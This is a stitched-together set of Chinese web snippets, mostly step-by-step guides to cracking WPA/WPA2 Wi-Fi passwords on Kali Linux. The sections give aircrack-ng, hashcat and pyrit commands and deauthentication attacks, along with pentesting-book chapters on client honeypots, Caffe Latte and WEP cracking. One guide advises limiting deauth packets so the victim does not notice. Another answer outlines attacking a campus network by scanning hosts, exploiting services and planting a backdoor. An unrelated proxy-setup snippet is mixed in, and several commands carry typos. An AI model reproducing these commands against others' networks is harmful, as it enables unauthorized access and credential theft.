① 如何使用Kali Linux破解WPA或WPA2无线局域网
目录部分1:准备工作1、了解在什么情况下可以合法破解无线局域网。2、下载Kali Linux磁盘镜像。3、将U盘插入电脑。4、制作可启动U盘5、将Kali Linux ISO文件复制到U盘上。6、安装Kali Linux。7、购买支持监听模式的无线网卡。8、以root用户身份登录Kali Linux电脑。9、将无线网卡插入Kali Linux电脑。部分2:破解无线局域网1、打开Kali Linux电脑上的"终端"应用程序。2、输入Aircrack-ng安装命令。3、出现提示时输入密码。4、安装Aircrack-ng。5、开启airmon-ng。6、找到监听接口名称。7、开始监听网络。8、启用监听模式接口。9、终止返回错误的进程。10、复查监听接口的名称。11、让电脑监听附近的路由器。12、找到要破解的路由器。13、确保路由器使用的是WPA或WPA2加密方式。14、记住路由器的MAC地址和信道号。15、监听所选网络以抓取握手包。16、等待握手。17、退出airomp-ng,然后打开桌面。18、重命名".cap"文件。19、将".cap"文件转换为"hccapx"格式。20、安装naive-hashcat。21、运行naive-hashcat。22、等到网络密码破解完成。部分3:在没有独显的电脑上使用Aircrack-Ng1、下载字典文件。2、通过aircrack-ng破解密码。3、等待"终端"显示结果。部分4:使用Deauth攻击强制握手1、了解Deauth攻击的机制。2、监听网络。3、等待设备连接网络。4、打开新的"终端"窗口。5、发送Deauth包。6、重新打开原"终端"窗口。7、搜索握手包。本指南介绍如何通过Kali Linux破解WPA或WPA2网络的密码。
部分1:准备工作
1、了解在什么情况下可以合法破解无线局域网。在大部分地区,你只能破解自己的WPA或WPA2网络,或在明确获得同意的情况下破解别人的网络。如果不符合上述条件,破解将被视为非法,甚至可能构成犯罪。
2、下载Kali Linux磁盘镜像。要破解WPA或WPA2网络,首推使用Kali Linux。你可以通过以下方式下载Kali Linux安装镜像(ISO):在电脑浏览器中前往https://www.kali.org/downloads/。
找到要使用的Kali版本,然后单击旁边的HTTP。
等待文件下载完成。
3、将U盘插入电脑。U盘至少要有4GB的存储空间。
4、制作可启动U盘。只有这样才能选择U盘作为安装位置。还可以使用Mac来制作启动盘。
5、将Kali Linux ISO文件复制到U盘上。打开U盘,然后将下载的Kali Linux ISO文件拖曳到U盘窗口中。完成后不要拔出U盘。
6、安装Kali Linux。要在电脑上安装Kali Linux,按以下步骤操作:重启Windows。
进入BIOS菜单。
找到"启动选项"或类似的选项,选项U盘名称,然后移到列表的顶部,这样就可以从U盘启动电脑了。
保存并退出,然后等待Kali Linux安装窗口出现。之后可能还需要再重启一次电脑。
按照Kali Linux安装窗口中的提示操作。
7、购买支持监听模式的无线网卡。可以在网上买或去电子商店买。一定要买支持监听(RFMON)的无线网卡,否则无法破解网络。很多电脑内置RFMON无线网卡,在购买前可以先试试下一节中的前四个步骤。
如果是在虚拟机上使用Kali Linux,无论电脑本身是否内置了无线网卡,都需要购买RFMON无线网卡。
8、以root用户身份登录Kali Linux电脑。输入root用户名和密码进行登录。整个破解过程都需要root帐户。
9、将无线网卡插入Kali Linux电脑。随后会立即开始安装网卡并下载驱动。如果看到提示,按屏幕上的说明完成安装。完成后,就可以开始进行网络破解了。即使之前曾在电脑上安装过该网卡,插入后仍需要在Kali Linux上重新安装。
大部分情况下,只需要将网卡插入电脑就能完成安装。
部分2:破解无线局域网
1、打开Kali Linux电脑上的"终端"应用程序。找到并单击"终端"应用程序,图标是一个中间带有白色"$_"图案的黑色方块。也可以按Alt+Ctrl+T来打开"终端"。
2、输入Aircrack-ng安装命令。输入以下命令,然后按? Enter:
sudo apt-get install aircrack-ng
3、出现提示时输入密码。输入电脑的登录密码,然后按? Enter。这样就可以使用root权限在"终端"中执行命令。如果稍后根据本文中的说明打开了另一个"终端"窗口,可能还需要运行sudo命令和/或再次输入密码。
4、安装Aircrack-ng。出现提示时输入Y,然后等待程序完成安装。
5、开启airmon-ng。输入以下命令,然后按? Enter。
airmon-ng
6、找到监听接口名称。它位于"Interface"列中。如果破解的是自己的网络,名称通常是"wlan0"。
如果没有看到监听接口,无线网卡可能不支持监听。
7、开始监听网络。输入以下命令,然后按? Enter开始监听:
airmon-ng start wlan0将"wlan0"替换为目标网络的名称。
8、启用监听模式接口。输入以下命令:
iwconfig
9、终止返回错误的进程。某些情况下,无线网卡会和电脑上运行的服务冲突。输入以下命令终止这些进程:
airmon-ng check kill
10、复查监听接口的名称。大部分情况下,名称类似"mon0"或"wlan0mon"。
11、让电脑监听附近的路由器。要获取附近的路由器列表,输入以下命令:
airomp-ng mon0将"mon0"替换为上一步中的监听接口名称。
12、找到要破解的路由器。在每一行字符串的末尾都有一个名称,找到要破解的网络名称。
13、确保路由器使用的是WPA或WPA2加密方式。如果在网络名称旁看到"WPA"或"WPA2",可以继续下一步骤,否则就无法破解网络。
14、记住路由器的MAC地址和信道号。这些信息在网络名称的左侧:MAC地址——它是路由器所在行最左侧的一串数字。
信道——它是WPA或WPA2标记左侧的数字,比如0、1、2等。
15、监听所选网络以抓取握手包。有设备连接网络时就会发生"握手",比如电脑连接路由器时。输入以下代码,注意将命令中的以下部分替换为网络的实际信息:
airomp-ng -c channel --bssid MAC -w /root/Desktop/ mon0将"channel"替换为上一步中找到的信道号。
将"MAC"替换为上一步中找到的MAC地址。
将"mon0"替换为实际的接口名称。
以下为地址示例:
airomp-ng -c 3 --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/ wlan0mon
16、等待握手。看到屏幕右上角出现"WPA handshake: <Mac地址>"的提示后,继续下一步。如果不想等待,可以使用Deauth攻击强行握手,然后再继续下一步。
17、退出airomp-ng,然后打开桌面。按Ctrl+C退出,检查电脑桌面上是否有".cap"文件。
18、重命名".cap"文件。改名的目的是方便你稍后找到它,但也可以不改。输入以下命令更改名称,注意将"name"替换为期望的名称:
mv ./-01.cap name.cap如果".cap"文件的当前名称不是"-01.cap",将它替换为实际的名称。
19、将".cap"文件转换为"hccapx"格式。可以使用Kali Linux的转换工具来转换。输入以下命令,注意将"name"替换为文件名称:
cap2hccapx.bin name.cap name.hccapx还可以前往https://hashcat.net/cap2hccapx/,然后单击 Choose File(选择文件)将".cap"文件上传到转换工具。完成后,单击Convert(转换)进行转换,将转换的文件下载到桌面,然后继续下一步。
20、安装naive-hashcat。你将它用来破解密码。按顺序输入以下命令:
sudo git clone https://github.com/brannondorsey/naive-hashcatcd naive-hashcatcurl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt如果电脑上没有独显,需要改用aircrack-ng。
21、运行naive-hashcat。安装完成后,输入以下命令,注意将所有"name"替换为".cap"文件的名称:
HASH_FILE=name.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hashcat.sh
22、等到网络密码破解完成。密码被破解后,"naive-hashcat"目录下的"name.pot"文件中会多出一个字符串,字符串中的最后一个分号后的文字或短语就是密码。破解密码所需的时间从几小时到几个月不等。
部分3:在没有独显的电脑上使用Aircrack-Ng
1、下载字典文件。最常用的是"Rock You"。可以输入以下命令下载它:
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt注意,如果WPA或WPA2密码不在字典里,aircrack-ng就无法破解。
2、通过aircrack-ng破解密码。输入以下命令,根据需要替换以下网络信息:
aircrack-ng -a2 -b MAC -w rockyou.txt name.cap如果破解的不是WPA2网络,而是WPA网络,将"-a2"替换为-a。
将"MAC"替换为上一节中找到的MAC地址。
将"name替换为".cap"文件的名称。
3、等待"终端"显示结果。如果看见"KEY FOUND!"标题,就代表aircrack-ng找到了密码。密码显示在此标题右侧的括号中。
部分4:使用Deauth攻击强制握手
1、了解Deauth攻击的机制。Deauth攻击会向你尝试破解的路由器发送恶意的取消身份验证包,从而造成网络断线并要求用户重新登录。一旦用户登录,你就能获得握手包。
2、监听网络。输入以下命令,根据需要输入网络信息:
airomp-ng -c channel --bssid MAC比如:
airomp-ng -c 1 --bssid 9C:5C:8E:C9:AB:C0
3、等待设备连接网络。看到两个连续的MAC地址以及包含生产商名称的字符串后,继续下一步。这表示已有客户端连接网络,比如电脑。
4、打开新的"终端"窗口。按Alt+Ctrl+T就可以打开。在原本的"终端"窗口中继续运行airomp-ng。
5、发送Deauth包。输入以下命令,注意将以下部分替换为实际的网络信息:
aireplay-ng -0 2 -a MAC1 -c MAC2 mon0"2"是指发送的数据包数量。可以增加或减少,但要注意,超过2个包可能会让对方察觉到有人在入侵。
将"MAC1"替换为原"终端"窗口底部最左侧的MAC地址。
将"MAC2"替换为原"终端"窗口底部最右侧的MAC地址。
将"mon0"替换为电脑最初搜索路由器时找到的接口名称。
以下是命令示例:
aireplay-ng -0 3 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
6、重新打开原"终端"窗口。在发送deauth包后,返回原"终端"窗口。
7、搜索握手包。在找到"WPA handshake: <地址>"后,继续破解网络。
小提示在启动服务器前,用此方法测试无线局域网中的漏洞,这样可以预防类似攻击。
警告擅自破解其他人的无线局域网在大部分国家都是违法行为。只能对自己的网络,或明确同意你测试的网络执行上述步骤。
发送两个以上的Deauth包可能会造成目标电脑崩溃,这样会让对方起疑。
② Kali Linux 无线渗透测试入门指南 第六章 攻击客户端
多数渗透测试者似乎把全部注意力都放在 WLAN 设施上,而不会注意无线客户端。但是要注意,黑客也可以通过入侵无线客户端来获得授权网络的访问权。
这一章中,我们将注意力从 WLAN 设施转移到无线客户端。客户端可能是连接的,也可能是独立未连接的。我们会看一看以客户端为目标的几种攻击。
通常,当客户端例如笔记本电脑打开时,它会探测之前连接的网络。这些网络储存在列表中,在基于 Windows 的系统上叫做首选网络列表(PNL)。同时,除了这个列表之外,无线客户端会展示任何范围内的可用网络。
黑客可以执行一个或多个下列事情:
这些攻击都叫做蜜罐攻击,因为黑客的接入点和正常的接入点错误连接。
下个练习中,我们会执行这两种攻击。
遵循这些指南来开始:
我们刚刚使用来自客户端的探针列表来创建蜜罐,并使用和邻近接入点相同的 ESSID。在第一个例子中,客户端在搜索网络的时候,自动连接到了我们。第二个例子中,因为我们离客户端比真正的接入点更近,我们的信号强度就更高,所以客户端连接到了我们。
在上一个练习中,如果客户端不自动连接到我们,我们能做什么呢?我们需要发送解除验证封包来打破正常的客户端到接入点的链接,之后如果我们的信号强度更高,客户端会连接到我们的伪造接入点上。通过将客户端连接到正常接入点,之后强迫它连接蜜罐来尝试它。
在蜜罐攻击中,我们注意到客户端会持续探测它们之前连接到的 SSID。如果客户端已经使用 WEP 连接到接入点,例如 Windows 的操作系统会缓存和储存 WEP 密钥。下一个客户端连接到相同接入点时,Windows 无线配置管理器就会自动使用储存的密钥。
Caffe Latte 攻击由 Vivek 发明,它是这本书的作者之一,并且在 Toorcon 9, San Diego, USA 上演示。Caffe Latte 攻击是一种 WEP 攻击,允许黑客仅仅使用客户端,获取授权网络的 WEP 密钥。这个攻击并不需要客户端距离授权 WEP 非常近。它可以从单独的客户端上破解 WEP 密钥。
在下一个练习中,我们将使用 Caffe Latte 攻击从客户端获取网络的 WEP 密钥。
遵循这些指南来开始:
我们成功从无线客户端获得了 WEP 密钥,不需要任何真实的接入点,或者在附近存在。这就是 Caffe Latte 攻击的力量。
基本上,WEP 接入点不需要验证客户端是否知道 WEP 密钥来获得加密后的流量。在连接在新的网络时,流量的第一部分总是会发送给路由器,它是 ARP 请求来询问 IP。
这个攻击的原理是,使用我们创建的伪造接入点反转和重放由无线客户端发送的 ARP 包。这些位反转的 ARP 请求封包导致了无线客户端发送更多 ARP 响应封包。
位反转接收加密值,并将其自改来创建不同的加密值。这里,我们可以接收加密 ARP 请求并创建高精确度的 ARP 响应。一旦我们发回了有效的 ARP 响应,我们可以一次又一次地重放这个值,来生成我们解密 WEP 密钥所需的流量。
要注意,所有这些封包都是用储存在客户端的 WEP 密钥加密。一旦我们得到了大量的这类封包, aircrack-NG 就能够轻易恢复出 WEP 密钥。
尝试修改 WEP 密钥并且重放攻击。这是个有难度的攻击,并且需要一些练习来成功实施。使用 Wireshark 检验无线网络上的流量是个好主意。
我们已经在之前的章节中看到了接入点上下文中的解除验证攻击,这一章中,我们会在客户端上下文中探索这种攻击。
下一个实验中,我们会发送解除验证封包给客户端并且破坏已经建立的接入点和客户端之间的连接。
遵循这些指南来开始:
我们刚刚看到了如何使用解除验证帧,选项性断开无线客户端到接入点的连接,即使使用了 WEP/WPA/WPA2 加密方式。这仅仅通过发送解除验证封包给接入点来完成 -- 客户端偶对,而不是发送广播解除验证封包给整个网络。
在上一个练习中,我们使用了解除验证攻击来破解连接。尝试使用解除关联访问来破坏客户端和接入点之间的连接。
我们已经看到了如何实施 Caffe Latte 攻击。Hirte 攻击扩展自 Caffe Latte 攻击,使用脆片机制并允许几乎任何封包的使用。
Hirte 攻击的更多信息请见 Aircrack-ng 的官网: http:// www.aircrack-ng.org/doku.php?id=hirte 。
我们现在使用 aircrack-ng 来在相同客户端上实施 Hirte 攻击。
遵循这些指南来开始:
我们对 WEP 客户端实施了 Hirte 攻击,客户端是隔离的,并远离授权网络。我们使用和 Caffe Latte 攻击相同的方式来破解密钥。
我们推荐你在客户端上设置不同的 WEP 密钥并多次尝试这个练习来获得自信。你可能会注意你需要多次重新连接客户端来使其生效。
在第四章中,我们看到了如何使用 airecrack-ng 来破解 WPA/WPA2 PSK,基本原理是捕获四次 WPA 握手,之后加载字典攻击。
关键问题是:可不可以仅仅使用客户端来破解 WPA,在没有接入点的情况下?
让我们再看一看 WPA 破解练习:
为了破解 WPA,我们需要来自四次握手的四个参数 -- 验证方的 Nounce,请求方的 Nounce,验证方的 MAC,请求方的 MAC。现在有趣的是,我们不需要握手中的全部四个封包来提取这些信息。我们可以只从封包 1 和 2,或 2 和 3 中提取。
为了破解 WPA-PSK,我们需要启动 WPA-PSK 蜜罐,并且当客户端连接时,只有消息 1 和 2 会发送。由于我们并不知道口令,我们就不能发送消息 3。但是,消息 1 和 2 包含所有密钥破解所需的信息:
我们能够只通过客户端破解 WPA。这是因为,即使只拥有前两个封包,我们也能获得针对握手的字典攻击的全部所需信息。
我们推荐你在客户端设置不同的 WPA 密钥,并且多次尝试这个练习来蝴蝶自信。你会注意到你需要多次重新连接客户端来使其生效。
Q1 Caffe Latte 攻击涉及到哪种加密?
Q2 蜜罐接入点通常使用哪种加密?
Q3 下列哪个攻击是 DoS 攻击?
Q4 Caffe Latte 攻击需要什么?
这一章中,我们了解了甚至是无线客户端也容易受到攻击。这包括蜜罐和其它错误关联攻击。Caffe Latte 攻击用于从无线客户端获得密钥;解除验证和解除关联攻击导致拒绝服务;Hirte 攻击是从漫游客户端获得 WEP 密钥的替代方案;最后,我们仅仅使用客户端破解了 WPA 个人口令。
下一章中,我们会使用目前为止学到的东西,在客户端和设施端实施多种高级无线攻击。所以,赶紧翻过这一页,进入下一章吧!
③ Kali Linux设置宿主网络代理
这里使用的是clash代理软件,首先开启clash找到端口:
接下来打开虚拟机,在这我使用的是Virvirtual box,打开终端输入:“ip route show” 找到ip地址:
这里我的ip是:10.0.2.2。
接下来打开代理设置:
把Network Proxy设置为手动,将代理ip全部填写为之前找到的ip地址(我的为:10.0.2.2),端口则是宿主机上的clash端口,最后一行忽略主机无需更改。
填写完毕直接点X关闭
到此代理设置完毕,接下来可以打开浏览器见证奇迹吧!
④ kail linux 怎么破解无线
首先需要有一台运行kali linux的机器,无论是虚拟机或物理机,一块支持监听模式的无线网卡
root@kali:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.lo no wireless extensions.
查看无线网卡设备名
root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If airomp-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!-e PID Name2772 dhclient4415 wpa_supplicantInterface Chipset Driverwlan1 Realtek RTL8187L rtl8187 - [phy0] (monitor mode enabled on mon0)
进入监听模式
airomp-ng mon0 会列出搜索到的所有无线网络
从中找到你要测试破解的,下来BSSID
root@kali:~/test# airomp-ng -w nenew -c 11 --bssid E4:D3:32:41:56:12 mon0 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E4:D3:32:41:56:12 -44 53 171 7 0 11 54e. WPA2 CCMP PSK TP-LINK_5612 BSSID STATION PWR Rate Lost Frames Probe E4:D3:32:41:56:12 00:00:00:00:00:00 0 0 - 1 0 18135 E4:D3:32:41:56:12 64:B4:73:40:60:5C -21 1e- 6e 0 7
当看到WPA handshake:说明抓到了握手包,就可以来破解了
如果一直抓不到,可以用如下命令来攻击,强迫重新握手
aireplay-ng -0 10 -a E4:D3:32:41:56:12 -c 64:B4:73:40:60:5C mon0 --ignore-negative-one
抓到握手包后,就可以用字典来跑密码了。
root@kali:~/test# aircrack-ng -w ./password.txt nenew-21.cap Opening nenew-21.capRead 18654 packets. # BSSID ESSID Encryption 1 D0:C7:C0:6E:53:53 TP-LINK_5353 WPA (1 handshake)Choosing first network as target.Opening nenew-21.capReading packets, please wait...
跑的速度如何取决于你机器的性能,更取决于你的字典
如果用物理机,有比较好的显卡,还可以用显卡来加速破解,效率比cpu高的多
kali linux下装显卡驱动,sdk等,参考如下链接
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html
我这里用显卡,很快就跑出了密码
root@kali:~# pyrit -r nenew-21.cap -i password.txt -b D0:C7:C0:6E:53:53 attack_passthroughPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+Parsing file 'nenew-21.cap' (1/1)...Parsed 14 packets (14 802.11-packets), got 1 AP(s)Tried 4420221 PMKs so far; 86496 PMKs per second.The password is 'qq123789'.
⑤ Kali Linux 无线渗透测试入门指南 第四章 WLAN 加密缺陷
即使做了最充分的预测,未来始终是不可预测的。WLAN 委员会设计了了 WEP 和 WPA 作为最简单的加密机制,但是,久而久之,这些机制拥有在现实世界中广泛公布和利用的缺陷。
WLAN 加密机制易受密码学攻击,这有相当长的历史了。这从 2000 年的 WEP 开始,它最后被完全破解。最近,攻击慢慢转向了 WPA。即使当前没有公开攻击方式用于在所有情况下破解 WPA,特殊情况下的攻击还是可行的。
WLAN 在空气中传输数据,所以保护数据的机密性是一种内在需求。使用加密是最佳方案。WLAN 委员会(IEEE 802.11)为数据加密指定了以下协议:
这一章中,我们会看一看每个加密协议,并演示针对它们的多种攻击。
WEP 协议在 2000 年发现漏洞,但是,诧异的是,它仍然被使用,并且接入点仍然自带 WEP 功能。
WEP 中有许多密码学缺陷,它们被 Walker,Arbaugh,Fluhrer,Martin,Shamir,KoreK,以及其它人发现。密码学立场上的评估超出了这本书的范围,并且涉及到复杂的数学。这一节中,我们会看一看如何使用 Kali 中便捷可用的工具来破解 WEP 加密。这包含整个 aircrack-ng 工具套件 -- airmon-ng , aireplay-ng , airomp-ng , aircrack-ng ,以及其它。
WEP 的基础缺陷是使用 RC4 和短的 IV 值,每 224 帧复用。虽然这本身是个大数,但是每 5000 个封包中还是有 50% 的几率重用四次。为了利用这个,我们尝试大量流量,是我们增加重用 IV 的可能性,从而比较两个使用相同密钥和 IV 加密的密文。
让我们首先在测试环境中建立 WEP,并且看看如何破解。
遵循以下指南来开始:
我们在环境中建立 WEP,并成功破解了 WEP 密钥。为了完成它,我们首先等待正常客户端连接到接入点。之后,我们使用 aireplay-ng 工具在网络上重放 ARP 封包。这会导致网络发送 ARP 重放封包,从而增加空中发送的数据封包数量。之后我们使用 aircrack-ng 工具,通过分析数据风暴的密码学缺陷来破解 WEP 密钥。
要注意我们也能够使用共享密钥验证绕过机制,来伪造接入点的验证,这会在后面的章节中学到。如果正常客户端离开了网络,这可以更方便一些。这会确保我们可以伪造验证和关联,并且继续将重放封包发送到网络。
在之前的练习中,如果正常客户端突然断开了网络,我们就不能重放封包,因为接入点会拒绝接受来自未关联客户端的封包。
你的挑战就是,使用即将在后面学到的共享密钥绕过伪造验证和授权,使你仍然能够将封包注入到网络中,并验证接入点是否接受和响应它们。
WPA 或者 WPA v1 主要使用 TKIP 加密算法。TKIP 用于改进 WEP,不需要完全新的硬件来运行。反之,WPA2 必须使用 AES-CCMP 算法来加密,这比 TKIP 更加强大和健壮。
WPA 和 WPA2 允许 基于 WAP 的验证,使用基于 RADIUS 服务器(企业)和预共享密钥(PSK)(个人)的验证模式。
WPA/WPA2 PSK 易受字典攻击。攻击所需的输入是客户端和接入点之间的四次 WPA 握手,以及包含常用口令的单词列表。之后,使用例如 Aircrack-ng 的工具,我们可以尝试破解 WPA/WPA2 PSK 口令。
四次握手的演示见下面:
WPA/WPA2 PSK 的原理是它导出了会话层面的密钥,叫做成对临时密钥(PTK),使用预共享密钥和五个其它参数 -- 网络 SSID、验证者 Nounce (ANounce)、申请者 Nounce (SNounce)、验证着 MAC 地址(接入点 MAC)、申请者 MAC 地址(WIFI 客户端 MAC)。密钥之后用于加密接入点和客户端之间的所有数据。
通过嗅探空气来窃取整个对话的攻击者,可以获得前面提到的全部五个参数。它唯一不能得到的东西就是预共享密钥。所以,预共享密钥如何创建?它由用户提供的 WPA-PSK 口令以及 SSID 导出。这些东西的组合通过基于密码的密钥推导函数(PBKDF2)来发送,它的输出是 256 位的共享密钥。
在典型的 WPA/WPA2 PSK 字典攻击中,攻击者会使用可能口令的大量字典以及攻击工具。工具会从每个口令中导出 256 位的预共享密钥,并和其它参数(之前提到过)一起使用来创建 PTK。PTK 用于在握手包之一中验证信息完整性检查(MIC)。如果匹配,从字典中猜测的口令就正确,反之就不正确。
最后,如果授权网络的口令存在于字典中,它会被识别。这就是 WPA/WPA2 PSK 破解的工作原理。下面的图展示涉及到的步骤:
下个练习中,我们会看一看如何破解 WPA PSK 无线网络。使用 CCMP(AES)的WPA2-PSK 网络的破解步骤与之相同。
遵循以下指南来开始:
我们在接入点上设置了 WPA-PSK,使用常见口令: abcdefgh 。之后我们使用解除验证攻击,让正常客户端重新连接到接入点。当我们重新连接时,我们捕获了客户端和接入点之间的 WPA 四次握手。
因为 WPA-PSK 易受字典攻击,我们向 Aircrack-ng 输入了包含 WPA 四次握手的捕获文件,以及常见口令的列表(以单词列表形式)。因为口令 abcdefgh 出现在单词列表中, Aircrack-ng 就能够破解 WPS-PSK 共享口令。要再次注意,在基于字典的 WPA 破解中,你的水平就等于你的字典。所以在你开始之前,编译一个大型并且详细的字典非常重要。通过 Kali 自带的字典,有时候可能不够,可能需要更多单词,尤其是考虑位置因素。
Cowpatty 是个同样使用字典攻击来破解 WPA-PSK 口令的工具。这个工具在 Kali 中自带。我将其留做练习,来让你使用 Cowpatty 破解 WPA-PSK 口令。
同样,设置不常见的口令,它不出现在你的字典中,并再次尝试。你现在再破解口令就不会成功了,无论使用 Aircrack-ng 还是 Cowpatty。
要注意,可以对 WPA2-PSK 网络执行相同攻击。我推荐你自己验证一下。
我们在上一节中看到,如果我们在字典中拥有正确的口令,破解个人 WPA 每次都会像魔法一样。所以,为什么我们不创建一个大型的详细字典,包含百万个常见密码和词组呢?这会帮助我们很多,并且多数情况都会最终破解出口令。这听起来不错,但是我们错过了一个核心组件 -- 所花费的时间。更多需要 CPU 和时间的计算之一就是使用 PSK 口令和 SSID 通过 PSKDF2 的预共享密钥。这个函数在输出 256 位的与共享密钥之前,计算超过 4096 次二者组合的哈希。破解的下一步就是使用这个密钥以及四次握手中的参数来验证握手中的 MIC。这一步计算了非常大。同样,握手中的参数每次都会变化,于是这一步不能预先计算。所以,为了加速破解进程,我们需要使来自口令的与共享密钥的计算尽可能快。
我们可以通过预先计算与共享密钥,在 802.11 标准术语中也叫作成对主密钥(PMK)来加速。要注意,因为 SSID 也用于计算 PMK,使用相同口令和不同 SSID,我们会得到不同的 PMK。所以,PMK 取决于口令和 SSID。
下个练习中,我们会看看如何预先计算 PMK,并将其用于 WPA/WPA2 的破解。
我们可以遵循以下步骤来开始:
我们查看了多种不同工具和技巧来加速 WPA/WPA2-PSK 破解。主要原理就是对给定的 SSID 和字典中的口令列表预计算 PMK。
在所有我们做过的联系中,我们使用多种技巧破解了 WEP 和 WPA 密钥。我们能拿这些信息做什么呢?第一步就是使用密钥解密我们捕获的数据封包。
下一个练习中,我们会在相同的我们所捕获的记录文件中解密 WEP 和 WPA 封包,使用我们破解得到的密钥。
遵循以下步骤来开始:
我们刚刚看到了如何使用 Airdecap-ng 解密 WEP 和 WPA/WPA2-PSK 加密封包。要注意,我们可以使用 Wireshark 做相同的事情。我们推荐你查阅 Wireshark 的文档来探索如何用它来完成。
我们也可以在破解网络密钥之后连接到授权网络。这在渗透测试过程中非常方便。使用破解的密钥登录授权网络,是你可以提供给客户的证明网络不安全的证据。
遵循以下步骤来开始:
我们连接到了 WEP 网络。
遵循以下步骤来开始:
默认的 WIFI 工具 iwconfig 不能用于连接 WPA/WPA2 网络。实际上的工具是 WPA_Supplicant 。这个实验中,我们看到如何使用它来连接 WPA 网络。
Q1 哪种封包用于封包重放?
Q2 WEP 什么时候能被破解?
Q3 WPA 什么时候能被破解?
这一章中,我们了解了 WLAN 加密。WEP 含有缺陷,无论 WEP 密钥是什么,使用足够的数据封包就能破解 WEP。WPA/WPA2 在密码学上不可破解;但是,在特殊的场景下,例如 WPA/WP2-PSK 中使用了弱口令,它就能够通过字典攻击来获得口令。
下一章中我们会看一看 WLAN 设施上的不同工具,例如伪造接入点,邪恶双生子,位反转攻击,以及其它。
⑥ kali怎么攻击网站
kali是靠指令攻击的,kali是一个系统,做黑客的基本都会把kali用的很熟练,另外,不叫攻击,叫审计,希望上面的回答可以帮助到你,谢谢
⑦ 虚拟机内kali怎样攻击校园网
首先你的kali得进入学校的局域网,然后用nmap 扫描存活的主机。
接着就是针对存在的服务漏洞进行攻击,获取权限后上传后门,以便维持访问。
然后就是。。。向你的舍友炫耀了。。。
最后就是。。。你好:我是查水表的,能开一下门吗?
⑧ Kali Linux 无线渗透测试入门指南 第二章 WLAN 和固有的不安全性
没有什么伟大的东西能在脆弱的基础上构建。在我们的语境中,固有的不安全性之上不能构建出安全。
WLAN 在设计上拥有特定的不安全性,它们可被轻易利用,例如,通过封包注入,以及嗅探(能够在很远处进行)。我们会在这一章利用这些缺陷。
由于这本书处理无线方面的安全,我们假设你已经对协议和封包的头部有了基本的了解。没有的话,或者你离开无线有很长时间了,现在是个好机会来回顾这个话题。
让我们现在快速复习一些 WLAN 的基本概念,大多数你可能已经知道了。在 WLAN 中,通信以帧的方式进行,一帧会拥有下列头部结构:
Frame Control 字段本身拥有更复杂的结构:
类型字段定义了下列三种 WLAN 帧:
我们在之后的章节中讨论不同攻击的时候,会讨论这些帧中每一种的安全隐患。
我们现在看一看如何使用 Wireshark 嗅探无线网络上的这些帧。也有其他工具 -- 例如 Airomp-NG,Tcpmp,或者 Tshark -- 你同样可以用于嗅探。我们在这本书中多数情况会使用 Wireshark,但是我们推荐你探索其它工具。第一步是创建监控模式的接口。这会为你的适配器创建接口,使我们可以读取空域中的所有无线帧,无论它们的目标是不是我们。在有线的世界中,这通常叫做混合模式。
让我们现在将无线网卡设为监控模式。
遵循下列指南来开始:
我们成功创建了叫做 mon0 的监控模式接口。这个接口用于嗅探空域中的无线封包。这个接口已经在我们的无线适配器中创建了。
可以创建多个监控模式的接口,使用相同的物理网卡。使用 airmon-ng 工具来看看如何完成。
太棒了!我们拥有了监控模式接口,等待从空域中读取一些封包。所以让我们开始吧。
下一个练习中,我们会使用 Wireshark 和刚刚创建的 mon0 监控器模式接口,从空域中嗅探封包。
遵循下列指南来开始:
观察封包中不同的头部字段,并将它们和之前了解的 WLAN 帧类型以及子类型关联。
我们刚刚从空域中嗅探了第一组封包。我们启动了 Wireshark,它使用我们之前创建的监控模式接口 mon0 。通过查看 Wireshark 的底部区域,你应该注意到封包捕获的速度以及目前为止捕获的封包数量。
Wireshark 的记录有时会令人生畏,即使在构成合理的无线网络中,你也会嗅探到数千个封包。所以深入到我们感兴趣的封包十分重要。这可以通过使用 Wireshark 中的过滤器来完成。探索如何使用这些过滤器来识别记录中唯一的无线设备 -- 接入点和无线客户端。
如果你不能做到它,不要着急,它是我们下一个要学的东西。
现在我们学习如何使用 WIreshark 中的过滤器来查看管理、控制和数据帧。
请逐步遵循下列指南:
我们刚刚学习了如何在 Wireshark 中,使用多种过滤器表达式来过滤封包。这有助于监控来自我们感兴趣的设备的所选封包,而不是尝试分析空域中的所有封包。
同样,我们也可以以纯文本查看管理、控制和数据帧的封包头部,它们并没有加密。任何可以嗅探封包的人都可以阅读这些头部。要注意,黑客也可能修改任何这些封包并重新发送它们。协议并不能防止完整性或重放攻击,这非常易于做到。我们会在之后的章节中看到一些这类攻击。
你可以查阅 Wireshark 的手册来了解更多可用的过滤器表达式,以及如何使用。尝试玩转多种过滤器组合,直到你对于深入到任何细节层级都拥有自信,即使在很多封包记录中。
下个练习中,我们会勘察如何嗅探我们的接入点和无线客户端之间传输的数
据封包。
这个练习中,我们会了解如何嗅探指定无线网络上的封包。出于简单性的原因,我们会查看任何没有加密的封包。
遵循下列指南来开始:
我们刚刚使用 WIreshark 和多种过滤器嗅探了空域中的数据。由于我们的接入点并没有使用任何加密,我们能够以纯文本看到所有数据。这是重大的安全问题,因为如果使用了类似 WIreshark 的嗅探器,任何在接入点 RF 范围内的人都可以看到所有封包。
